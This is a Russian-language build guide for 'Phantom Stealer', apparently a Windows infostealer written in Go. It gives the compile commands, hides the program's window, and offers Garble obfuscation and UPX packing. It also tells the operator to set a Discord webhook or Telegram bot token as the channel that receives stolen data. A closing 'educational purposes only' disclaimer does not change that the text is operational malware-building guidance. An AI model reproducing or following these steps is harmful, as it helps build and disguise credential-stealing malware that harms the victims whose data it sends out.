╔══════════════════════════════════════════════════════════════╗
║     БЫСТРАЯ КОМПИЛЯЦИЯ PHANTOM STEALER                       ║
╚══════════════════════════════════════════════════════════════╝

📋 ТРЕБОВАНИЯ:
───────────────
1. Go 1.21+ (https://golang.org/dl/)
2. C компилятор (MinGW-w64, TDM-GCC или VS Build Tools)
3. Windows 10/11

⚡ БЫСТРЫЙ СТАРТ:
─────────────────

СПОСОБ 1: Двойной клик по compile.bat
   → Просто запустите compile.bat - всё сделается автоматически

СПОСОБ 2: PowerShell скрипт (рекомендуется)
   → Откройте PowerShell в папке проекта:
   
   .\build.ps1

СПОСОБ 3: Вручную через командную строку
   → Откройте PowerShell и выполните:
   
   cd "c:\Users\Admin\Desktop\phantom-stealer-master"
   $env:CGO_ENABLED = "1"
   $env:CC = "gcc"
   go mod tidy
   go build -ldflags "-s -w -H windowsgui" -o phantom.exe .

───────────────────────────────────────────────────────────────

🔧 РАСШИРЕННЫЕ ОПЦИИ:

С обфускацией (Garble):
   go install mvdan.cc/garble@latest
   .\build.ps1 -Garble

С UPX сжатием:
   .\build.ps1 -UPX

Всё вместе:
   .\build.ps1 -Garble -UPX

───────────────────────────────────────────────────────────────

⚠️  ВАЖНО ПЕРЕД КОМПИЛЯЦИЕЙ:

Отредактируйте config/config.go и укажите:
   - DiscordWebhook = "ваш_webhook_url"
   - или TelegramToken + TelegramChatID
   - BuildID = "ваш_идентификатор"

───────────────────────────────────────────────────────────────

❌ ЧАСТЫЕ ПРОБЛЕМЫ:

"go: command not found"
   → Установите Go и добавьте в PATH

"gcc: command not found"
   → Установите MinGW-w64 и добавьте в PATH

Ошибка компиляции SQLite3
   → Убедитесь что CGO_ENABLED=1 и gcc установлен

───────────────────────────────────────────────────────────────

📁 РЕЗУЛЬТАТ:
   → phantom.exe будет создан в текущей папке

⚠️  ВНИМАНИЕ:
   Этот проект только для образовательных целей!
   Использование в незаконных целях - преступление!

